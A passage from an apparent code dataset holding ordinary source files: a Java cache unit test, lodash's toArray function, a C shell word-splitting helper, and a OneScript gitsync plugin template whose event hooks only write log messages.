\"uno\");\n assertNull(\"put\", cache.put(\"one\", \"uno\"));\n assertHasSingleKey(cache, \"one\", \"uno\");\n\n wantedListener.noteKeyUpdate(cache, \"one\", \"only\", \"uno\");\n assertEquals(\"replace\", \"uno\", cache.put(\"one\", \"only\"));\n assertHasSingleKey(cache, \"one\", \"only\");\n\n wantedListener.noteKeyRemoval(cache, \"one\", \"only\");\n cache.erase();\n assertNoSingleKey(cache, \"one\");\n assertEquals(\"byteSize\", origByteSize, cache.getSizeInBytes());\n\n cache.setExpireTime(100);\n wantedListener.noteKeyAddition(cache, \"one\", \"uno\");\n assertNull(\"put\", cache.put(\"one\", \"uno\"));\n assertHasSingleKey(cache, \"one\", \"uno\");\n\n wantedListener.noteKeyRemoval(cache, \"one\", \"uno\");\n Thread.sleep(200);\n assertNoSingleKey(cache, \"one\");\n }\n\n assertEquals(\"get-miss\", 10, cache.getMissCountNotFound());\n assertEquals(\"get-miss-total\", 10, cache.getMissCountTotal());\n assertEquals(\"get-hit\", 12, cache.getHitCount());\n assertEquals(\"remove-hit\", 6, cache.getRemoveHitCount());\n assertEquals(\"remove-miss\", 10, cache.getRemoveMissCount());\n cache.removeListener(gotListener);\n assertEquals(\"listener\", wantedListener, gotListener);\n UtilCache.clearCache(cache.getName());\n UtilCache.clearCache(\":::\" + cache.getName());\n }\n\n @Test\n public void testSimple() throws Exception {\n UtilCache cache = createUtilCache(5, 0, 0, false);\n basicTest(cache);\n }\n\n @Test\n public void testPutIfAbsent() throws Exception {\n UtilCache cache = createUtilCache(5, 5, 2000, false);\n Listener gotListener = createListener(cache);\n Listener wantedListener = new Listener<>();\n wantedListener.noteKeyAddition(cache, \"two\", \"dos\");\n assertNull(\"putIfAbsent\", cache.putIfAbsent(\"two\", \"dos\"));\n assertHasSingleKey(cache, \"two\", \"dos\");\n assertEquals(\"putIfAbsent\", \"dos\", cache.putIfAbsent(\"two\", \"double\"));\n assertHasSingleKey(cache, \"two\", \"dos\");\n cache.removeListener(gotListener);\n assertEquals(\"listener\", wantedListener, gotListener);\n }\n\n @Test\n public void testPutIfAbsentAndGet() throws Exception {\n UtilCache cache = createUtilCache(5, 5, 2000, false);\n Listener gotListener = createListener(cache);\n Listener wantedListener = new Listener<>();\n wantedListener.noteKeyAddition(cache, \"key\", \"value\");\n wantedListener.noteKeyAddition(cache, \"anotherKey\", \"anotherValue\");\n assertNull(\"no-get\", cache.get(\"key\"));\n assertEquals(\"putIfAbsentAndGet\", \"value\", cache.putIfAbsentAndGet(\"key\", \"value\"));\n assertHasSingleKey(cache, \"key\", \"value\");\n assertEquals(\"putIfAbsentAndGet\", \"value\", cache.putIfAbsentAndGet(\"key\", \"newValue\"));\n assertHasSingleKey(cache, \"key\", \"value\");\n String anotherValueAddedToCache = new String(\"anotherValue\");\n String anotherValueNotAddedToCache = new String(\"anotherValue\");\n assertEquals(anotherValueAddedToCache, anotherValueNotAddedToCache);\n assertNotSame(anotherValueAddedToCache, anotherValueNotAddedToCache);\n String cachedValue = cache.putIfAbsentAndGet(\"anotherKey\", anotherValueAddedToCache);\n assertSame(cachedValue, anotherValueAddedToCache);\n cachedValue = cache.putIfAbsentAndGet(\"anotherKey\", anotherValueNotAddedToCache);\n assertNotSame(cachedValue, anotherValueNotAddedToCache);\n assertSame(cachedValue, anotherValueAddedToCache);\n cache.removeListener(gotListener);\n assertEquals(\"listener\", wantedListener, gotListener);\n }\n\n @Test\n public void testChangeMemSize() throws Exception {\n int size = 5;\n long ttl = 2000;\n 
UtilCache cache = createUtilCache(size, size, ttl, false);\n Map map = new HashMap<>();\n assertKeyLoop(size, cache, map);\n cache.setMaxInMemory(2);\n assertEquals(\"cache.size\", 2, cache.size());\n map.keySet().retainAll(cache.getCacheLineKeys());\n assertEquals(\"map-keys\", map.keySet(), cache.getCacheLineKeys());\n assertThat(\"map-values\", cache.values(), containsInAnyOrder(map.values().toArray()));\n cache.setMaxInMemory(0);\n assertEquals(\"map-keys\", map.keySet(), cache.getCacheLineKeys());\n assertThat(\"map-values\", cache.values(), containsInAnyOrder(map.values().toArray()));\n for (int i = size * 2; i < size * 3; i++) {\n String s = Integer.toString(i);\n assertKey(s, cache, s, new String(s), new String(\":\" + s), i - size * 2 + 3, map);\n }\n cache.setMaxInMemory(0);\n assertEquals(\"map-keys\", map.keySet(), cache.getCacheLineKeys());\n assertThat(\"map-values\", cache.values(), containsInAnyOrder(map.values().toArray()));\n cache.setMaxInMemory(size);\n for (int i = 0; i < size * 2; i++) {\n map.remove(Integer.toString(i));\n }\n // Can't compare the contents of these collections, as setting LRU after not\n // having one, means the items that get evicted are essentially random.\n assertEquals(\"map-keys\", map.keySet().size(), cache.getCacheLineKeys().size());\n assertEquals(\"map-values\", map.values().size(), cache.values().size());\n }\n\n private static void expireTest(UtilCache cache, int size, long ttl) throws Exception {\n Map map = new HashMap<>();\n assertKeyLoop(size, cache, map);\n Thread.sleep(ttl + 500);\n map.clear();\n for (int i = 0; i < size; i++) {\n String s = Integer.toString(i);\n assertNull(\"no-key(\" + s + \")\", cache.get(s));\n }\n assertEquals(\"map-keys\", map.keySet(), cache.getCacheLineKeys());\n assertThat(\"map-values\", cache.values(), containsInAnyOrder(map.values().toArray()));\n assertKeyLoop(size, cache, map);\n assertEquals(\"map-keys\", map.keySet(), cache.getCacheLineKeys());\n assertThat(\"map-values\", cache.values(), containsInAnyOrder(map.values().toArray()));\n }\n\n private static void assertKeyLoop(int size, UtilCache cache, Map map) {\n for (int i = 0; i < size; i++) {\n String s = Integer.toString(i);\n assertKey(s, cache, s, new String(s), new String(\":\" + s), i + 1, map);\n }\n }\n\n @Test\n public void testExpire() throws Exception {\n UtilCache cache = createUtilCache(5, 5, 2000, false);\n expireTest(cache, 5, 2000);\n long start = System.currentTimeMillis();\n useAllMemory();\n long end = System.currentTimeMillis();\n long ttl = end - start + 1000;\n cache = createUtilCache(1, 1, ttl, true);\n expireTest(cache, 1, ttl);\n assertFalse(\"not empty\", cache.isEmpty());\n useAllMemory();\n assertNull(\"not-key(0)\", cache.get(\"0\"));\n assertTrue(\"empty\", cache.isEmpty());\n }\n}\n"} {"text": "var Symbol = require('./_Symbol'),\n copyArray = require('./_copyArray'),\n getTag = require('./_getTag'),\n isArrayLike = require('./isArrayLike'),\n isString = require('./isString'),\n iteratorToArray = require('./_iteratorToArray'),\n mapToArray = require('./_mapToArray'),\n setToArray = require('./_setToArray'),\n stringToArray = require('./_stringToArray'),\n values = require('./values');\n\n/** `Object#toString` result references. */\nvar mapTag = '[object Map]',\n setTag = '[object Set]';\n\n/** Built-in value references. */\nvar symIterator = Symbol ? 
Symbol.iterator : undefined;\n\n/**\n * Converts `value` to an array.\n *\n * @static\n * @since 0.1.0\n * @memberOf _\n * @category Lang\n * @param {*} value The value to convert.\n * @returns {Array} Returns the converted array.\n * @example\n *\n * _.toArray({ 'a': 1, 'b': 2 });\n * // => [1, 2]\n *\n * _.toArray('abc');\n * // => ['a', 'b', 'c']\n *\n * _.toArray(1);\n * // => []\n *\n * _.toArray(null);\n * // => []\n */\nfunction toArray(value) {\n if (!value) {\n return [];\n }\n if (isArrayLike(value)) {\n return isString(value) ? stringToArray(value) : copyArray(value);\n }\n if (symIterator && value[symIterator]) {\n return iteratorToArray(value[symIterator]());\n }\n var tag = getTag(value),\n func = tag == mapTag ? mapToArray : (tag == setTag ? setToArray : values);\n\n return func(value);\n}\n\nmodule.exports = toArray;\n"} {"text": "/* THIS CODE IS USELESS until I find a way to use spaces in Makefile\n * variables. It seemed like a good idea at the time and I'm not deleting\n * it now because I'm a packrat. --Cliff\n */\n\n\n/*\n * This program combines with bash's IFS variable to provide smarter\n * word splitting than bash normally provides.\n *\n * cflags='-Dthis -Dthat=\"argument with spaces\"'\n * can cause problems when ${cflags} if expanded and word split and\n * becomes these four arguments:\n * -Dthis\n * -Dthat=\"argument\n * with\n * spaces\"\n *\n * So instead use:\n * saveifs=\"$IFS\"\n * cflags=`smartsplit \"${cflags}\"`\n * IFS=`smartsplit -ifs \"${cflags}\"`\n * ${cflags}\n * IFS=\"$saveifs\"\n *\n * Ugly, but it's the best thing I thought of in order to allow me to have\n * spaces in my configuration file.\n */\n\n#include \n#include \n#include \n#include \n\n/*\n * returns 1 if successful, 0 otherwise. NOTE: In theory, any character\n * that's not currently in the string could be a separator. However,\n * empirical evidence suggests that at least under bash 1.14.7.1, control-a\n * will not work as a separator. So, we try a few specific separators by\n * hand, then try any printable character, then try control-b, then give\n * up.\n */\n\nstatic int\nfindsep (const char *str, char *ifsp)\n{\n int retval;\n static char nice_separators[] = \"@:+\";\n\n retval = 0;\n\n if (!retval)\n {\n const char *nicep;\n \n for (nicep = nice_separators; !retval && *nicep; ++nicep)\n\t{\n\t if (!strchr (str, *nicep))\n\t {\n\t *ifsp = *nicep;\n\t retval = 1;\n\t }\n\t}\n }\n\n if (!retval)\n {\n int c;\n\n for (c = 0; !retval && c < 255; ++c)\n\t{\n\t if (isprint (c))\n\t {\n\t if (!strchr (str, c))\n\t\t{\n\t\t *ifsp = c;\n\t\t retval = 1;\n\t\t}\n\t }\n\t}\n }\n\n if (!retval)\n if (!strchr (str, 2))\n {\n\t*ifsp = 2;\n\tretval = 1;\n }\n return retval;\n}\n\nstatic int\nsmartsplit (const char *str, char *ifsp, char **strpp)\n{\n int retval;\n\n retval = findsep (str, ifsp);\n if (retval && strpp)\n {\n const char *ip;\n char *op;\n char current_quote;\n \n *strpp = malloc (strlen (str) + 1);\n current_quote = 0;\n for (ip = str, op = *strpp; *ip; ++ip)\n\t{\n\t if (current_quote)\n\t {\n\t *op++ = *ip;\n\t if (*ip == current_quote)\n\t\tcurrent_quote = 0;\n\t }\n\t else\n\t {\n\t if (*ip == '\\'' || *ip == '\"')\n\t\t{\n\t\t *op++ = *ip;\n\t\t current_quote = *ip;\n\t\t}\n\t else if (isspace ((unsigned char) *ip))\n\t\t*op++ = *ifsp;\n\t else\n\t\t*op++ = *ip;\n\t }\n\t}\n *op = 0;\n }\n \n return retval;\n}\n\nstatic void\noutput_prog_name (const char *prog)\n{\n const char *lastslash;\n\n lastslash = strrchr (prog, '/');\n fputs (lastslash ? 
lastslash + 1 : prog, stderr);\n}\n\nstatic void\nusage (const char *prog)\n{\n fputs (\"Usage: \", stderr);\n output_prog_name (prog);\n fputs (\" [-ifs] string\", stderr);\n}\n\nint\nmain (int argc, char *argv[])\n{\n int retval;\n\n retval = 0;\n switch (argc)\n {\n case 2:\n {\n\tint success;\n\tchar ifs;\n\tchar *str;\n\n\tsuccess = smartsplit (argv[1], &ifs, &str);\n\tif (success)\n\t puts (str);\n\telse\n\t {\n\t output_prog_name (argv[0]);\n\t fprintf (stderr, \": all separators used\\n\");\n\t retval = 1;\n\t }\n }\n break;\n case 3:\n if (strcmp (argv[1], \"-ifs\") == 0)\n\t{\n\t char ifs;\n\n\t smartsplit (argv[2], &ifs, 0);\n\t putchar (ifs);\n\t}\n else\n\t{\n\t usage (argv[0]);\n\t retval = 1;\n\t}\n break;\n default:\n usage (argv[0]);\n retval = 2;\n break;\n }\n return retval;\n}\n"} {"text": "#Использовать logos\n\nПерем Лог;\n\n#Область Подписки_на_события\n\n#Область Подписка_на_активизацию_плагинов\n\n// Вызывается при начале установке новых подписчиков\n//\n// Параметры:\n// МенеджерСинхронизации - Объект.МенеджерСинхронизации - ссылка на класс МенеджерСинхронизации\n//\nПроцедура ПриАктивизации(МенеджерСинхронизации) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПриАктивизации> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n#КонецОбласти\n\n#Область Подписка_на_получение_параметров_выполнения\n\n// Вызывается при передаче параметров в МенеджерСинхронизации \n//\n// Параметры:\n// ПараметрыПодписчиков - Объект.ПараметрыПодписчиков - ссылка на класс ПараметрыПодписчиков\n// \n// Объект <ПараметрыПодписчиков> реализовывает публичные функции:\n// * Функция <Параметр>\n// \t\tПолучает и возвращает значение из индекса параметров\n//\n// \t\tПараметры:\n// \t * СтрокаИмениПараметра - Строка - имя параметра допустимо указание нескольких имен к параметру через пробел\n// \t\t Например, \"config --config -c c\"\n// \t * ЗначениеПоУмолчанию - Произвольный - возвращаемое значение в случае отсутствия параметра после получения из индекса\n// \t\tВозвращаемое значение:\n// \t Строка, Число, Булево, Массив, Соответствие, Неопределено - значение параметра\n// * Функция <ПолучитьПараметры> \n// \t\tВозвращает используемый индекс параметров \n//\n// \t\tВозвращаемое значение:\n// \t Соответствие - соответствие ключей и значение параметров\n//\n// Примеры: \n// ```\n// \n// ОтправлятьМетки = ПараметрыПодписчиков.Параметр(\"push --push P ОтправлятьМетки\", Ложь);\n//\n// ```\nПроцедура ПриПолученииПараметров(ПараметрыПодписчиков) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПриПолученииПараметров> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n#КонецОбласти\n\n#Область Подписки_на_регистрацию_команд_приложения\n\n// Вызывается при регистрации команды приложения\n//\n// Параметры:\n// ИмяКоманды - Строка - имя регистрируемой команды \n// КлассРеализации - Объект.КомандаПриложения - ссылка на класс <КомандаПриложения>\n//\nПроцедура ПриРегистрацииКомандыПриложения(ИмяКоманды, КлассРеализации) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПриРегистрацииКомандыПриложения> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n#КонецОбласти\n\n#Область Подписки_на_начало_и_окончания_выполнения\n\n// Вызывается перед началом работы менеджера синхронизации\n//\n// Параметры:\n// ПутьКХранилищу - Строка - полный путь к хранилищу конфигурации \n// КаталогРабочейКопии - Строка - полный путь к рабочему каталогу копии\n//\nПроцедура ПередНачаломВыполнения(ПутьКХранилищу, КаталогРабочейКопии) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПередНачаломВыполнения> для плагина <%1>\", 
Имя());\n\nКонецПроцедуры\n\n// Вызывается после завершения работы менеджера синхронизации\n//\n// Параметры:\n// ПутьКХранилищу - Строка - полный путь к хранилищу конфигурации \n// КаталогРабочейКопии - Строка - полный путь к рабочему каталогу копии\n//\nПроцедура ПослеОкончанияВыполнения(ПутьКХранилищу, КаталогРабочейКопии) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПослеОкончанияВыполнения> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n#КонецОбласти\n\n#Область Подписки_на_получение_таблицы_версий\n\n// Вызывается при получении таблицы версий из хранилища конфигурации\n//\n// Параметры:\n// ТаблицаВерсий - ТаблицаЗначений - инициализированная таблица с колонками:\n// * Дата - Дата - дата версии\n// * НомерВерсии - Число - номер версии\n// \t * Комментарий - Строка - комментарий автора к версии\n// * Автор - Строка - имя автора версии в хранилище \n// \t * Тэг - Строка - метка версии в хранилище \t\n// \t * ГУИД_Автора - Строка - уникальный идентификатор автора версии\n// * ПредставлениеАвтора - Строка - представление автора для коммита в git\n// ПутьКХранилищу - Строка - полный путь к хранилищу конфигурации \n// НачальнаяВерсия - Число - номер начальной версии хранилища\n// СтандартнаяОбработка - Булево - признак отказ от обработки по умолчанию\n//\nПроцедура ПриПолученииТаблицыВерсий(ТаблицаВерсий, ПутьКХранилищу, НачальнаяВерсия, СтандартнаяОбработка) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПриПолученииТаблицыВерсий> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// Вызывается после получении таблицы версий из хранилища конфигурации\n//\n// Параметры:\n// ТаблицаВерсий - ТаблицаЗначений - заполненная таблица с колонками:\n// * Дата - Дата - дата версии\n// * НомерВерсии - Число - номер версии\n// \t * Комментарий - Строка - комментарий автора к версии\n// * Автор - Строка - имя автора версии в хранилище \n// \t * Тэг - Строка - метка версии в хранилище \t\n// \t * ГУИД_Автора - Строка - уникальный идентификатор автора версии\n// * ПредставлениеАвтора - Строка - представление автора для коммита в git\n// ПутьКХранилищу - Строка - полный путь к хранилищу конфигурации \n//\nПроцедура ПослеПолученияТаблицыВерсий(ТаблицаВерсий, ПутьКХранилищу) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПослеПолученияТаблицыВерсий> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n#КонецОбласти\n\n#Область Подписки_на_получение_таблицы_пользователей\n\n// Вызывается при получении таблицы пользователей из хранилища конфигурации\n//\n// Параметры:\n// ТаблицаПользователей - ТаблицаЗначений - инициализированная таблица с колонками:\n// * Автор - Строка - имя автора версии в хранилище \n// * ПредставлениеАвтора - Строка - представление автора для коммита в git\n// \t * ГУИД_Автора - Строка - уникальный идентификатор автора версии\n// ПутьКХранилищу - Строка - полный путь к хранилищу конфигурации \n// СтандартнаяОбработка - Булево - признак отказ от обработки по умолчанию\n//\nПроцедура ПриПолученииТаблицыПользователей(ТаблицаПользователей, ПутьКХранилищу, СтандартнаяОбработка) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПриПолученииТаблицыПользователей> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// Вызывается после получении таблицы пользователей из хранилища конфигурации\n//\n// Параметры:\n// ТаблицаПользователей - ТаблицаЗначений - заполненная таблица с колонками:\n// * Автор - Строка - имя автора версии в хранилище \n// * ПредставлениеАвтора - Строка - представление автора для коммита в git\n// \t * ГУИД_Автора - Строка - уникальный идентификатор автора версии\n// ПутьКХранилищу 
- Строка - полный путь к хранилищу конфигурации \n//\nПроцедура ПослеПолученияТаблицыПользователей(ТаблицаПользователей, ПутьКХранилищу) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПослеПолученияТаблицыПользователей> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// Вызывается при получении таблицы пользователей из хранилища конфигурации\n//\n// Параметры:\n// ПутьКФайлуАвторов - Строка - полный путь к хранилищу конфигурации \n// ТаблицаАвторов - ТаблицаЗначений - инициализированная таблица с колонками:\n// * Автор - Строка - имя автора версии в хранилище \n// * ПредставлениеАвтора - Строка - представление автора для коммита в git\n// СтандартнаяОбработка - Булево - признак отказ от обработки по умолчанию\n//\nПроцедура ПриПолученииТаблицыАвторов(ПутьКФайлуАвторов, ТаблицаАвторов, СтандартнаяОбработка) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПриПолученииТаблицыАвторов> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// Вызывается при получении таблицы пользователей из хранилища конфигурации\n//\n// Параметры:\n// ПутьКФайлуАвторов - Строка - полный путь к хранилищу конфигурации \n// ТаблицаАвторов - ТаблицаЗначений - инициализированная таблица с колонками:\n// * Автор - Строка - имя автора версии в хранилище \n// * ПредставлениеАвтора - Строка - представление автора для коммита в git\n//\nПроцедура ПослеПолученияТаблицыАвторов(ПутьКФайлуАвторов, ТаблицаАвторов) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПослеПолученияТаблицыАвторов> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n#КонецОбласти\n\n#Область Подписки_на_обработки_строки_версии\n\n// Вызывается перед началом обработки таблица истории хранилища конфигурации\n//\n// Параметры:\n// ТаблицаИсторииХранилища - ТаблицаЗначений - заполненная таблица с колонками:\n// * Дата - Дата - дата версии\n// * НомерВерсии - Число - номер версии\n// \t * Комментарий - Строка - комментарий автора к версии\n// * Автор - Строка - имя автора версии в хранилище \n// \t * Тэг - Строка - метка версии в хранилище \t\n// \t * ГУИД_Автора - Строка - уникальный идентификатор автора версии\n// * ПредставлениеАвтора - Строка - представление автора для коммита в git\n// ТекущаяВерсия - Число - текущая/последняя синхронизированная версия из файла \n// СледующаяВерсия - Число - следующая версия для обработки\n// МаксимальнаяВерсияДляРазбора - Число - максимальная версия для обработки\n//\nПроцедура ПередНачаломЦиклаОбработкиВерсий(ТаблицаИсторииХранилища, ТекущаяВерсия, СледующаяВерсия, МаксимальнаяВерсияДляРазбора) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПередНачаломЦиклаОбработкиВерсий> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// Вызывается перед обработкой версии хранилища\n//\n// Параметры:\n// СтрокаВерсии - СтрокаТаблицыЗначений - текущая строка из ТаблицаИсторииХранилища\n// ТекущаяВерсия - Число - текущая версия для обработки\n//\nПроцедура ПередОбработкойВерсииХранилища(СтрокаВерсии, ТекущаяВерсия) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПередОбработкойВерсииХранилища> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// Вызывается при обработкой версии хранилища\n//\n// Параметры:\n// СтрокаВерсии - СтрокаТаблицыЗначений - текущая строка из ТаблицаИсторииХранилища\n// ТекущаяВерсия - Число - текущая версия для обработки\n//\nПроцедура ПриОбработкеВерсииХранилища(СтрокаВерсии, ТекущаяВерсия) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПриОбработкеВерсииХранилища> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// Вызывается после обработкой версии хранилища\n//\n// Параметры:\n// СтрокаВерсии - 
СтрокаТаблицыЗначений - текущая строка из ТаблицаИсторииХранилища\n// ТекущаяВерсия - Число - текущая версия для обработки\n//\nПроцедура ПослеОбработкиВерсииХранилища(СтрокаВерсии, ТекущаяВерсия) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПослеОбработкиВерсииХранилища> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n#КонецОбласти\n\n#Область Подписки_на_выполнение_коммита\n\n// Вызывается перед фиксацией изменений в рабочей копии\n//\n// Параметры:\n// КаталогРабочейКопии - Строка - полный путь к рабочему каталогу копии\n// Комментарий - Строка - комментарий изменений при фиксации\n// Автор - Строка - автор изменений при фиксации \n// Дата - Дата - дата изменений фиксации \n//\nПроцедура ПередКоммитом(КаталогРабочейКопии, Комментарий, Автор, Дата) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПередКоммитом> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// Вызывается при фиксации изменений в рабочей копии\n//\n// Параметры:\n// ГитРепозиторий - Объект.ГитРепозиторий - подготовленный объект класса <ГитРепозиторий>\n// Комментарий - Строка - комментарий при фиксации изменений\n// ПроиндексироватьОтслеживаемыеФайлы - Булево - признак добавления не отслеживаемых файлов в фиксацию\n// ИмяФайлаКомментария - Строка - путь к файлу для записи комментария фиксации\n// АвторДляГит - Строка - автор изменений изменений в формате `Иванов_А `\n// ДатаДляГит - Дата - дата изменений \n// Коммитер - Строка - автор фиксации изменений в формате `Иванов_А `\n// ДатаКоммитера - Дата - дата фиксации изменений\n//\nПроцедура ПриКоммите(ГитРепозиторий,\n\t\t\t\t\t\tКомментарий,\n\t\t\t\t\t\tПроиндексироватьОтслеживаемыеФайлы,\n\t\t\t\t\t\tИмяФайлаКомментария,\n\t\t\t\t\t\tАвторДляГит,\n\t\t\t\t\t\tДатаДляГит,\n\t\t\t\t\t\tКоммитер,\n\t\t\t\t\t\tДатаКоммитера) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПриКоммите> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// Вызывается после фиксацией изменений в рабочей копии\n//\n// Параметры:\n// ГитРепозиторий - Объект.ГитРепозиторий - подготовленный объект класса <ГитРепозиторий>\n// КаталогРабочейКопии - Строка - полный путь к рабочему каталогу копии\n//\nПроцедура ПослеКоммита(ГитРепозиторий, КаталогРабочейКопии) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПослеКоммита> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n#КонецОбласти\n\n#Область Подписки_на_начало_и_окончания_выгрузки_версии_конфигурации\n\n\n// <Описание процедуры>\n//\n// Параметры:\n// Конфигуратор - <Тип.Вид> - <описание параметра>\n// КаталогРабочейКопии - <Тип.Вид> - <описание параметра>\n// ПутьКХранилищу - <Тип.Вид> - <описание параметра>\n// НомерВерсии - <Тип.Вид> - <описание параметра>\n//\nПроцедура ПередНачаломВыгрузкиВерсииХранилищаКонфигурации(Конфигуратор, КаталогРабочейКопии, ПутьКХранилищу, НомерВерсии) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПередНачаломВыгрузкиВерсииХранилищаКонфигурации> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// <Описание процедуры>\n//\n// Параметры:\n// Конфигуратор - <Тип.Вид> - <описание параметра>\n// КаталогРабочейКопии - <Тип.Вид> - <описание параметра>\n// ПутьКХранилищу - <Тип.Вид> - <описание параметра>\n// НомерВерсии - <Тип.Вид> - <описание параметра>\n//\nПроцедура ПослеОкончанияВыгрузкиВерсииХранилищаКонфигурации(Конфигуратор, КаталогРабочейКопии, ПутьКХранилищу, НомерВерсии) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПослеОкончанияВыгрузкиВерсииХранилищаКонфигурации> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n#КонецОбласти\n\n#Область Подписки_на_загрузку_версии_конфигурации_из_хранилища\n\n// <Описание 
процедуры>\n//\n// Параметры:\n// Конфигуратор - <Тип.Вид> - <описание параметра>\n// КаталогРабочейКопии - <Тип.Вид> - <описание параметра>\n// ПутьКХранилищу - <Тип.Вид> - <описание параметра>\n// НомерВерсии - <Тип.Вид> - <описание параметра>\n//\nПроцедура ПередЗагрузкойВерсииХранилищаКонфигурации(Конфигуратор, КаталогРабочейКопии, ПутьКХранилищу, НомерВерсии) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПередЗагрузкойВерсииХранилищаКонфигурации> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// <Описание процедуры>\n//\n// Параметры:\n// Конфигуратор - <Тип.Вид> - <описание параметра>\n// КаталогРабочейКопии - <Тип.Вид> - <описание параметра>\n// ПутьКХранилищу - <Тип.Вид> - <описание параметра>\n// НомерВерсии - <Тип.Вид> - <описание параметра>\n// СтандартнаяОбработка - <Тип.Вид> - <описание параметра>\n//\nПроцедура ПриЗагрузкеВерсииХранилищаВКонфигурацию(Конфигуратор, КаталогРабочейКопии, ПутьКХранилищу, НомерВерсии, СтандартнаяОбработка) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПриЗагрузкеВерсииХранилищаВКонфигурацию> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// <Описание процедуры>\n//\n// Параметры:\n// Конфигуратор - <Тип.Вид> - <описание параметра>\n// КаталогРабочейКопии - <Тип.Вид> - <описание параметра>\n// ПутьКХранилищу - <Тип.Вид> - <описание параметра>\n// НомерВерсии - <Тип.Вид> - <описание параметра>\n//\nПроцедура ПослеЗагрузкиВерсииХранилищаВКонфигурацию(Конфигуратор, КаталогРабочейКопии, ПутьКХранилищу, НомерВерсии) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПослеЗагрузкиВерсииХранилищаВКонфигурацию> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n#КонецОбласти\n\n#Область Подписки_на_выгрузку_конфигурации_в_исходники\n\n// <Описание процедуры>\n//\n// Параметры:\n// Конфигуратор - <Тип.Вид> - <описание параметра>\n// КаталогРабочейКопии - <Тип.Вид> - <описание параметра>\n// КаталогВыгрузки - <Тип.Вид> - <описание параметра>\n// ПутьКХранилищу - <Тип.Вид> - <описание параметра>\n// НомерВерсии - <Тип.Вид> - <описание параметра>\n//\nПроцедура ПередВыгрузкойКонфигурациюВИсходники(Конфигуратор, КаталогРабочейКопии, КаталогВыгрузки, ПутьКХранилищу, НомерВерсии) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПередВыгрузкойКонфигурациюВИсходники> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// <Описание процедуры>\n//\n// Параметры:\n// Конфигуратор - <Тип.Вид> - <описание параметра>\n// КаталогВыгрузки - <Тип.Вид> - <описание параметра>\n// СтандартнаяОбработка - <Тип.Вид> - <описание параметра>\n//\nПроцедура ПриВыгрузкеКонфигурациюВИсходники(Конфигуратор, КаталогВыгрузки, СтандартнаяОбработка) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПриВыгрузкеКонфигурациюВИсходники> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n// <Описание процедуры>\n//\n// Параметры:\n// Конфигуратор - <Тип.Вид> - <описание параметра>\n// КаталогВыгрузки - <Тип.Вид> - <описание параметра>\n//\nПроцедура ПослеВыгрузкиКонфигурациюВИсходники(Конфигуратор, КаталогВыгрузки) Экспорт\n\n\tЛог.Информация(\"Вызвано событие <ПослеВыгрузкиКонфигурациюВИсходники> для плагина <%1>\", Имя());\n\nКонецПроцедуры\n\n#КонецОбласти\n\n#Область Подписки_на_очистку_каталога_рабочей_версии\n\n// <Описание процедуры>\n//\n// Параметры:\n// Конфигуратор - <Тип.Вид> - <описание параметра>\n// КаталогРабочейКопии - <Тип.Вид> - <описание параметра>\n// КаталогВыгрузки - <Тип.Вид> - <описание параметра>\n// ПутьКХранилищу - <Тип.Вид> - <описание параметра>\n// НомерВерсии - <Тип.Вид> - <описание параметра>\n//\nПроцедура ПередОчисткойКаталогаРабочейКопии(Конфигуратор, 
